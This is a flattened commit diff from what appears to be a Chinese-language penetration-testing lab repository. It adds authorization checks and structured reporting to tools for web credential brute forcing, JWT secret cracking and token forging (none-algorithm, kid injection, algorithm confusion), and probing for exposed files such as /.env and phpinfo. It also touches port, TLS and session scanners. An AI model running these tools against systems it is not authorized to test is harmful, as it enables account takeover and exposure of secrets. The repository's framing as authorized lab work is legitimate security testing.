for _, r := range results { "target": *target,
fmt.Printf(" - [%s] %s: %s\n", r.Category, r.Type, r.Payload[:min(50, len(r.Payload))]) "status": "needs-review",
"severity": "info",
"timestamp": time.Now().UTC().Format(time.RFC3339),
"request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads},
"payload_or_probe": map[string]interface{}{"reflected_hits": results, "dom_hits": domResults, "csp": cspResult},
"evidence_refs": []string{},
"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
"authorization_scope": "lab-local, lab-public, authorized-third-party",
"destructive_risk": "low",
"run_id": *runID,
"case_id": *caseID,
} }
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) if len(results) > 0 {
report["status"] = "verified"
report["severity"] = "high"
} else if len(domResults) > 0 {
report["status"] = "suspected"
report["severity"] = "medium"
}
if *evidenceDir != "" {
_ = os.MkdirAll(*evidenceDir, 0o755)
evidencePath := *evidenceDir + "/xss-scanner-go.json"
if raw, err := json.MarshalIndent(report, "", " "); err == nil {
_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
}
}
var content []byte
if *format == "json" {
content, _ = json.MarshalIndent(report, "", " ")
} else {
text := []string{
strings.Repeat("=", 60),
"XSS Scanner (Go)",
strings.Repeat("=", 60),
"Target: " + *target,
"Method: " + *method,
fmt.Sprintf("Reflected Hits: %d", len(results)),
fmt.Sprintf("DOM Findings: %d", len(domResults)),
"Status: " + report["status"].(string),
}
content = []byte(strings.Join(text, "\n"))
}
if *output != "" {
_ = os.WriteFile(*output, append(content, '\n'), 0o644)
}
fmt.Println(string(content))
} }

72
03-authentication/bruteforce/tools/web-brute.py
查看文件

@@ -28,6 +28,21 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import re import re
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -249,14 +264,21 @@ def main():
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)") parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
bruteforcer = WebBruteForcer( bruteforcer = WebBruteForcer(
threads=args.threads, timeout=args.timeout, delay=args.delay threads=args.threads, timeout=args.timeout, delay=args.delay
) )
bruteforcer.session.headers.update(parse_headers(args.header))
if args.proxy:
bruteforcer.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
bruteforcer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
usernames = [] usernames = []
if args.userlist: if args.userlist:
@@ -276,10 +298,6 @@ def main():
bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)") bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)")
sys.exit(1) sys.exit(1)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Web Brute Force Tool{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
bruteforcer.print_result("INFO", f"目标: {args.url}") bruteforcer.print_result("INFO", f"目标: {args.url}")
bruteforcer.print_result("INFO", f"用户数: {len(usernames)}") bruteforcer.print_result("INFO", f"用户数: {len(usernames)}")
bruteforcer.print_result("INFO", f"密码数: {len(passwords)}") bruteforcer.print_result("INFO", f"密码数: {len(passwords)}")
@@ -295,23 +313,45 @@ def main():
data_template=args.data, data_template=args.data,
success_pattern=args.success, success_pattern=args.success,
fail_pattern=args.fail, fail_pattern=args.fail,
verbose=args.verbose, verbose=args.verbose and args.format == "text",
) )
elapsed = time.time() - bruteforcer.start_time elapsed = time.time() - bruteforcer.start_time
rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0 rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
bruteforcer.print_result("INFO", f"总尝试: {bruteforcer.attempts}") ref = write_evidence(
bruteforcer.print_result("INFO", f"耗时: {elapsed:.2f}s ({rate:.1f} req/s)") args,
"web-brute-results.json",
if results: {"results": results, "attempts": bruteforcer.attempts, "elapsed": elapsed, "rate": rate},
bruteforcer.print_result("SUCCESS", f"发现 {len(results)} 个有效凭证!") )
for r in results: if ref:
print(f" - {r['username']}:{r['password']}") evidence_refs.append(ref)
else: status = "verified" if results else "needs-review"
bruteforcer.print_result("INFO", "未发现有效凭证") severity = "high" if results else "medium"
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") report = make_report(
tool="web-brute",
mode="credential-spray-lab",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"results": results, "username_count": len(usernames), "password_count": len(passwords)},
request_summary={"method": args.method, "threads": args.threads, "delay": args.delay, "rate": rate},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"Web Brute Force Tool",
"=" * 60,
f"Target: {args.url}",
f"Attempts: {bruteforcer.attempts}",
f"Elapsed: {elapsed:.2f}s",
f"Hits: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":

126
03-authentication/jwt/tools/jwt-cracker.py
查看文件

@@ -30,6 +30,16 @@ import time
from typing import Dict, Optional, Tuple, List from typing import Dict, Optional, Tuple, List
import sys import sys
import re import re
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors: class Colors:
@@ -307,57 +317,33 @@ def main():
parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值") parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值")
parser.add_argument("--analyze", action="store_true", help="分析 JWT") parser.add_argument("--analyze", action="store_true", help="分析 JWT")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
cracker = JWTCracker() cracker = JWTCracker()
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}JWT Cracker & Analyzer{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
try: try:
header, payload, _ = cracker.decode(args.token) header, payload, _ = cracker.decode(args.token)
if args.format == "text":
print(f"{Colors.CYAN}Header:{Colors.END}") print(f"{Colors.CYAN}Header:{Colors.END}")
print(f" {json.dumps(header, indent=2)}") print(f" {json.dumps(header, indent=2)}")
print(f"\n{Colors.CYAN}Payload:{Colors.END}") print(f"\n{Colors.CYAN}Payload:{Colors.END}")
print(f" {json.dumps(payload, indent=2)}") print(f" {json.dumps(payload, indent=2)}")
except Exception as e: except Exception as e:
cracker.print_result("ERROR", str(e)) cracker.print_result("ERROR", str(e))
sys.exit(1) sys.exit(1)
if args.analyze: analysis = cracker.analyze(args.token) if args.analyze else {"issues": []}
print(f"\n{Colors.CYAN}Analysis:{Colors.END}") forged = None
analysis = cracker.analyze(args.token) if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
if "issues" in analysis: elif args.attack == "kid":
for issue in analysis["issues"]: forged = cracker.attack_kid_injection(args.token, args.kid_injection)
color = ( elif args.attack == "confusion":
Colors.RED forged = cracker.attack_algorithm_confusion(args.token)
if issue["severity"] == "HIGH"
else Colors.YELLOW
if issue["severity"] == "MEDIUM"
else Colors.BLUE
)
print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}")
print(f" {issue['description']}")
if args.attack:
print(f"\n{Colors.CYAN}Attack: {args.attack}{Colors.END}")
if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
cracker.print_result("SUCCESS", f"Forged Token (none): {forged}")
elif args.attack == "kid":
forged = cracker.attack_kid_injection(args.token, args.kid_injection)
cracker.print_result("SUCCESS", f"Forged Token (kid): {forged}")
elif args.attack == "confusion":
forged = cracker.attack_algorithm_confusion(args.token)
cracker.print_result("INFO", "需要公钥来利用算法混淆攻击")
wordlist = None wordlist = None
if args.wordlist: if args.wordlist:
@@ -368,24 +354,62 @@ def main():
cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}") cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}")
sys.exit(1) sys.exit(1)
print(f"\n{Colors.CYAN}Cracking...{Colors.END}") stdout_buffer = io.StringIO()
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
start = time.time() start = time.time()
secret = cracker.crack(args.token, wordlist, args.verbose) with capture:
secret = cracker.crack(args.token, wordlist, args.verbose and args.format == "text")
elapsed = time.time() - start elapsed = time.time() - start
if secret: if secret:
cracker.print_result("FOUND", f"密钥破解成功: {secret}")
cracker.print_result("INFO", f"耗时: {elapsed:.2f}s")
forged = cracker.encode(header, payload, secret, header.get("alg", "HS256")) forged = cracker.encode(header, payload, secret, header.get("alg", "HS256"))
cracker.print_result("SUCCESS", f"可以伪造任意 Token")
else:
cracker.print_result(
"WARNING",
f"未能破解密钥 (尝试了 {len(wordlist) if wordlist else len(cracker.common_secrets)} 个)",
)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") evidence_refs = []
ref = write_evidence(
args,
"jwt-analysis.json",
{
"header": header,
"payload": payload,
"analysis": analysis,
"attack": args.attack,
"secret_found": bool(secret),
"captured_stdout": stdout_buffer.getvalue()[-1000:],
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if secret or forged else "needs-review"
severity = "high" if secret else "medium" if analysis.get("issues") else "info"
report = make_report(
tool="jwt-cracker",
mode="jwt-analysis-and-weak-secret-test",
target="jwt-token",
status=status,
severity=severity,
payload_or_probe={
"header": header,
"payload_keys": sorted(payload.keys()),
"issues": analysis.get("issues", []),
"attack": args.attack,
"secret_found": bool(secret),
},
request_summary={"wordlist": args.wordlist or "builtin-common", "elapsed_seconds": round(elapsed, 2)},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
extra={"forged_token_present": bool(forged)},
)
text_lines = [
"=" * 60,
"JWT Cracker & Analyzer",
"=" * 60,
f"Token Alg: {header.get('alg', 'unknown')}",
f"Issues: {len(analysis.get('issues', []))}",
f"Secret Found: {'yes' if secret else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":

99
03-authentication/session/tools/session-lab.py 普通文件
查看文件

@@ -0,0 +1,99 @@
#!/usr/bin/env python3
"""
Session / Token Boundary Lab Tool
LAB ONLY | AUTHORIZED TARGETS ONLY
"""
from __future__ import annotations
import argparse
import re
import sys
from pathlib import Path
from typing import Any, Dict, List
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402
COOKIE_ATTRS = ["HttpOnly", "Secure", "SameSite", "Path", "Domain"]
STORAGE_PATTERNS = {
"localStorage": re.compile(r"localStorage\.(setItem|getItem)|window\.localStorage", re.I),
"sessionStorage": re.compile(r"sessionStorage\.(setItem|getItem)|window\.sessionStorage", re.I),
"token-ish": re.compile(r"(jwt|token|authorization|bearer)", re.I),
}
def analyze(target: str, timeout: float, headers: Dict[str, str]) -> Dict[str, Any]:
response = requests.get(target, timeout=timeout, headers=headers, verify=False)
cookies = []
for raw in response.headers.get("Set-Cookie", "").split(","):
raw = raw.strip()
if not raw:
continue
attrs = {attr: (attr.lower() in raw.lower()) for attr in COOKIE_ATTRS}
cookies.append({"raw": raw[:300], "attributes": attrs})
storage_hits = []
for name, pattern in STORAGE_PATTERNS.items():
if pattern.search(response.text):
storage_hits.append(name)
suspicious_headers = []
for name in ["Set-Cookie", "Authorization", "X-Forwarded-User", "X-Original-URL"]:
if response.headers.get(name):
suspicious_headers.append({"name": name, "value": response.headers.get(name)[:200]})
return {
"status_code": response.status_code,
"cookies": cookies,
"storage_hits": storage_hits,
"suspicious_headers": suspicious_headers,
"body_excerpt": response.text[:600],
}
def main() -> int:
parser = argparse.ArgumentParser(description="Session / Token Boundary Lab Tool")
parser.add_argument("--target", required=True, help="目标 URL")
parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
headers = parse_headers(args.header)
findings = analyze(args.target, args.timeout, headers)
evidence_refs = []
ref = write_evidence(args, "session-lab.json", findings)
if ref:
evidence_refs.append(ref)
suspicious = len(findings["cookies"]) + len(findings["storage_hits"]) + len(findings["suspicious_headers"])
report = make_report(
tool="session-lab",
mode="cookie-storage-session-boundary-check",
target=args.target,
status="verified" if suspicious else "needs-review",
severity="medium" if suspicious else "info",
payload_or_probe=findings,
request_summary={"timeout": args.timeout, "header_names": sorted(headers.keys())},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Session / Token Boundary Lab Tool",
"=" * 60,
f"Target: {args.target}",
f"Cookie Findings: {len(findings['cookies'])}",
f"Storage Hits: {len(findings['storage_hits'])}",
f"Suspicious Headers: {len(findings['suspicious_headers'])}",
]
return emit_report(args, report, text_lines)
if __name__ == "__main__":
raise SystemExit(main())

34
04-server-security/infrastructure/tools/site-scope-mapper.py
查看文件

@@ -30,13 +30,22 @@ import socket
import ssl import ssl
import warnings import warnings
from dataclasses import asdict, dataclass, field from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Dict, List, Optional, Set from typing import Dict, List, Optional, Set
import sys
warnings.filterwarnings("ignore", message="urllib3 v2 only supports OpenSSL") warnings.filterwarnings("ignore", message="urllib3 v2 only supports OpenSSL")
import requests import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, make_report, write_evidence # noqa: E402
DEFAULT_PORTS = [80, 443, 8080, 8443] DEFAULT_PORTS = [80, 443, 8080, 8443]
@@ -226,6 +235,7 @@ def main() -> int:
action="store_true", action="store_true",
help="确认目标属于自有资产或已明确授权", help="确认目标属于自有资产或已明确授权",
) )
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
if not args.ack_authorized: if not args.ack_authorized:
@@ -267,11 +277,25 @@ def main() -> int:
"related_hosts": sorted(related_hosts), "related_hosts": sorted(related_hosts),
} }
if args.json: evidence_refs = []
print(json.dumps(report, indent=2, ensure_ascii=True)) ref = write_evidence(args, "site-scope-map.json", report)
else: if ref:
print(render_text(report)) evidence_refs.append(ref)
return 0 payload = make_report(
tool="site-scope-mapper",
mode="single-target-scope-map",
target=args.target,
status="verified" if report["http"] or report["tls"] else "needs-review",
severity="low",
payload_or_probe=report,
request_summary={"ports": ports, "target_type": target_type},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
if args.json and args.format == "text":
args.format = "json"
return emit_report(args, payload, render_text(report).splitlines())
if __name__ == "__main__": if __name__ == "__main__":

96
04-server-security/misconfiguration/tools/misconfig-lab.py 普通文件
查看文件

@@ -0,0 +1,96 @@
#!/usr/bin/env python3
"""
Misconfiguration Lab Tool
LAB ONLY | AUTHORIZED TARGETS ONLY
"""
from __future__ import annotations
import argparse
import sys
from pathlib import Path
from typing import Any, Dict, List
from urllib.parse import urljoin
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402
DEFAULT_PATHS = [
"/.env",
"/server-status",
"/actuator/health",
"/swagger-ui.html",
"/phpinfo.php",
"/admin/",
"/debug",
]
def probe(target: str, timeout: float, headers: Dict[str, str]) -> List[Dict[str, Any]]:
results = []
for path in DEFAULT_PATHS:
url = urljoin(target if target.endswith("/") else target + "/", path.lstrip("/"))
try:
response = requests.get(url, timeout=timeout, headers=headers, verify=False)
results.append(
{
"path": path,
"url": url,
"status_code": response.status_code,
"server": response.headers.get("Server"),
"content_type": response.headers.get("Content-Type"),
"body_excerpt": response.text[:300],
}
)
except Exception as exc:
results.append({"path": path, "url": url, "error": str(exc)})
return results
def main() -> int:
parser = argparse.ArgumentParser(description="Misconfiguration Lab Tool")
parser.add_argument("--target", required=True, help="目标 URL")
parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
headers = parse_headers(args.header)
results = probe(args.target, args.timeout, headers)
evidence_refs = []
ref = write_evidence(args, "misconfig-lab.json", {"results": results})
if ref:
evidence_refs.append(ref)
suspicious = [item for item in results if item.get("status_code") in {200, 401, 403}]
report = make_report(
tool="misconfig-lab",
mode="misconfiguration-surface-check",
target=args.target,
status="verified" if suspicious else "needs-review",
severity="medium" if suspicious else "info",
payload_or_probe={"results": results, "suspicious": suspicious},
request_summary={"timeout": args.timeout, "paths": DEFAULT_PATHS},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Misconfiguration Lab Tool",
"=" * 60,
f"Target: {args.target}",
f"Paths Checked: {len(DEFAULT_PATHS)}",
f"Suspicious Responses: {len(suspicious)}",
]
return emit_report(args, report, text_lines)
if __name__ == "__main__":
raise SystemExit(main())

55
04-server-security/scanning/tools/port-scanner.py
查看文件

@@ -27,6 +27,14 @@ import time
from concurrent.futures import ThreadPoolExecutor, as_completed from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors: class Colors:
@@ -229,37 +237,54 @@ def main():
parser.add_argument("-t", "--threads", type=int, default=100, help="线程数") parser.add_argument("-t", "--threads", type=int, default=100, help="线程数")
parser.add_argument("--timeout", type=float, default=1.0, help="超时时间") parser.add_argument("--timeout", type=float, default=1.0, help="超时时间")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
scanner = PortScanner(threads=args.threads, timeout=args.timeout) scanner = PortScanner(threads=args.threads, timeout=args.timeout)
if args.format != "text":
scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
if args.top_ports: if args.top_ports:
ports = scanner.top_ports[: args.top_ports] ports = scanner.top_ports[: args.top_ports]
else: else:
ports = scanner.parse_ports(args.ports) ports = scanner.parse_ports(args.ports)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Port Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.host}") scanner.print_result("INFO", f"目标: {args.host}")
scanner.print_result("INFO", f"端口: {len(ports)}") scanner.print_result("INFO", f"端口: {len(ports)}")
scanner.print_result("INFO", f"线程: {args.threads}") scanner.print_result("INFO", f"线程: {args.threads}")
results = scanner.scan_host(args.host, ports, args.verbose) results = scanner.scan_host(args.host, ports, args.verbose)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
if results: ref = write_evidence(args, "port-scan-results.json", {"results": results, "ports": ports})
scanner.print_result("SUCCESS", f"发现 {len(results)} 个开放端口:") if ref:
print(f"\n{'PORT':<10} {'SERVICE':<15} {'BANNER'}") evidence_refs.append(ref)
print("-" * 60) status = "verified" if results else "needs-review"
for r in sorted(results, key=lambda x: x["port"]): severity = "medium" if results else "info"
banner = r["banner"][:40] if r["banner"] else r["service"] report = make_report(
print(f"{r['port']:<10} {r['service']:<15} {banner}") tool="port-scanner",
else: mode="minimal-port-scan",
scanner.print_result("INFO", "未发现开放端口") target=args.host,
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") status=status,
severity=severity,
payload_or_probe={"ports": ports, "open_ports": results},
request_summary={"threads": args.threads, "timeout": args.timeout},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Port Scanner",
"=" * 60,
f"Target: {args.host}",
f"Ports Checked: {len(ports)}",
f"Open Ports: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":

97
04-server-security/tls/tools/tls-scanner.py
查看文件

@@ -26,6 +26,14 @@ import re
from typing import Dict, List, Tuple, Optional from typing import Dict, List, Tuple, Optional
from datetime import datetime from datetime import datetime
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors: class Colors:
@@ -271,74 +279,45 @@ def main():
parser.add_argument("-u", "--url", required=True, help="目标 URL 或主机名") parser.add_argument("-u", "--url", required=True, help="目标 URL 或主机名")
parser.add_argument("-p", "--port", type=int, default=443, help="端口 (默认: 443)") parser.add_argument("-p", "--port", type=int, default=443, help="端口 (默认: 443)")
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
hostname = args.url.replace("https://", "").replace("http://", "").split("/")[0] hostname = args.url.replace("https://", "").replace("http://", "").split("/")[0]
scanner = TLSScanner(timeout=args.timeout) scanner = TLSScanner(timeout=args.timeout)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}TLS Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {hostname}:{args.port}") scanner.print_result("INFO", f"目标: {hostname}:{args.port}")
print(f"\n{Colors.CYAN}[*] 扫描协议支持...{Colors.END}")
results = scanner.scan(hostname, args.port) results = scanner.scan(hostname, args.port)
evidence_refs = []
print(f"\n{Colors.CYAN}协议支持:{Colors.END}") ref = write_evidence(args, "tls-results.json", results)
for proto, supported in results["protocols"].items(): if ref:
status = ( evidence_refs.append(ref)
f"{Colors.GREEN}支持{Colors.END}" severity = "high" if any(issue["severity"] in ["CRITICAL", "HIGH"] for issue in results["issues"]) else "medium" if results["issues"] else "info"
if supported status = "verified" if results["issues"] else "needs-review"
else f"{Colors.RED}不支持{Colors.END}" report = make_report(
) tool="tls-scanner",
if supported and proto in ["SSLv2", "SSLv3"]: mode="tls-readonly-check",
status = f"{Colors.RED}支持 (不安全){Colors.END}" target=f"{hostname}:{args.port}",
elif supported and proto in ["TLSv1.0", "TLSv1.1"]: status=status,
status = f"{Colors.YELLOW}支持 (过时){Colors.END}" severity=severity,
print(f" {proto:<10} {status}") payload_or_probe={"issues": results["issues"], "protocols": results["protocols"], "hsts": results["hsts"]},
request_summary={"timeout": args.timeout, "certificate_present": bool(results["certificate"])},
if results["cipher"]: evidence_refs=evidence_refs,
print(f"\n{Colors.CYAN}当前密码套件:{Colors.END}") destructive_risk="low",
cipher_name, cipher_proto, cipher_bits = results["cipher"] args=args,
print(f" 名称: {cipher_name}") )
print(f" 协议: {cipher_proto}") text_lines = [
print(f" 密钥长度: {cipher_bits} bits") "=" * 60,
"TLS Scanner",
if results["certificate"]: "=" * 60,
print(f"\n{Colors.CYAN}证书信息:{Colors.END}") f"Target: {hostname}:{args.port}",
cert = results["certificate"] f"Issues: {len(results['issues'])}",
print(f" 主题: {cert['subject'].get('commonName', 'N/A')}") f"HSTS Enabled: {'yes' if results['hsts']['enabled'] else 'no'}",
print(f" 颁发者: {cert['issuer'].get('commonName', 'N/A')}") f"Status: {status}",
print(f" 有效期: {cert['not_before']} - {cert['not_after']}") ]
emit_report(args, report, text_lines)
print(f"\n{Colors.CYAN}HSTS:{Colors.END}")
if results["hsts"]["enabled"]:
print(f" 状态: {Colors.GREEN}已启用{Colors.END}")
print(f" Max-Age: {results['hsts']['max_age']}")
print(
f" IncludeSubDomains: {'' if results['hsts']['include_subdomains'] else ''}"
)
print(f" Preload: {'' if results['hsts']['preload'] else ''}")
else:
print(f" 状态: {Colors.RED}未启用{Colors.END}")
print(f"\n{Colors.CYAN}安全问题:{Colors.END}")
if results["issues"]:
for issue in sorted(results["issues"], key=lambda x: x["severity"]):
color = (
Colors.RED
if issue["severity"] in ["CRITICAL", "HIGH"]
else Colors.YELLOW
)
print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}")
print(f" 建议: {issue['recommendation']}")
else:
print(f" {Colors.GREEN}未发现安全问题{Colors.END}")
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
if __name__ == "__main__": if __name__ == "__main__":

12
07-framework-security/cms/directus/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/discourse/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/drupal/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/ghost/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
